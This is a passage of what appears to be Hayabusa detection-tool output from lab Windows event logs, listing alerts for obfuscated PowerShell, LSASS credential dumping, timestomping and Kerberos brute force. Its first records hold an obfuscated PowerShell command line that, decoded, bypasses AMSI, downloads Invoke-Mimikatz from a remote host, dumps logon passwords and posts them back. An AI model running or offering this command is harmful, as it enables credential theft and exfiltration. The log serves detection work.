, 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:30.651 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-23 18:26:45.843 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
2021-11-25 00:48:24.985 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
2021-11-25 00:48:25.000 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
2021-11-28 00:47:00.365 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
2021-11-28 00:47:00.369 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
2021-12-01 07:05:47.229 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: A57649D1-92D8-61A4-7191-000000000000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
2021-12-02 23:48:15.983 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:15.983 +09:00,-,-,medium,InitAccess : PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:test1/rey/b aer/sgfg/g/tbyt/ysy/admtest/wyt/vase/ytuntsr/mgdi/syvsdy/s/vt/test2/ugu/sef/gsdf/yvas/accrt/tc/dyfgdhbn/bsfin/ar/xvtrz/vs/uydzry/vay/yvsyv/tary/go/xt/nini/bdcy/xc/sfs/srey/m,og/vdr/tfay/nd/vga/vrat/rec/ryver IpAddress:::ffff:10.23.123.11 timeframe:24h",rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,-
2021-12-02 23:48:16.298 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:16.308 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:16.311 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:16.338 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:16.338 +09:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 TargetUserName:SM_2f6964c8f421408ab/SM_374806bcc65140a5a/Administrator/DefaultAccount/krbtgt/Test-ADM/SM_8b9faa99d83446d1b/SM_6aaeeb113c0c4af3a/administrator/SM_25e3b4425ffd47aab/SM_957258b5879242afb/SM_27d255b6407743b08/SM_2b6f1a51ac6c41b2a/Guest/SM_b2a35e76f50a4c23a/$P51000-50I28MP5JB3E IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,-
2021-12-02 23:48:16.342 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:16.956 +09:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 TargetUserName:svc-ata/svc_adfs01/HealthMailbox0ab31b3/HealthMailbox2cfa5bd/HealthMailboxf49e2c8/HealthMailbox9a2d0da/HealthMailboxf7e4358/adminupn42/vuln_scan/HealthMailboxe8b0d98/HealthMailboxdabf0a3/HealthMailboxc9291f7/proabcdef/HealthMailboxa935ecd/HealthMailboxeb3dc3f/HealthMailboxebdc745/domadm/admin-te/HealthMailboxa99e1bd/admin-hacker/svc_nxlog/Svc-SQL-DB01 IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,-
2021-12-02 23:48:17.267 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.271 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.274 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.277 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.281 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.284 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.287 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
2021-12-02 23:48:17.319 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
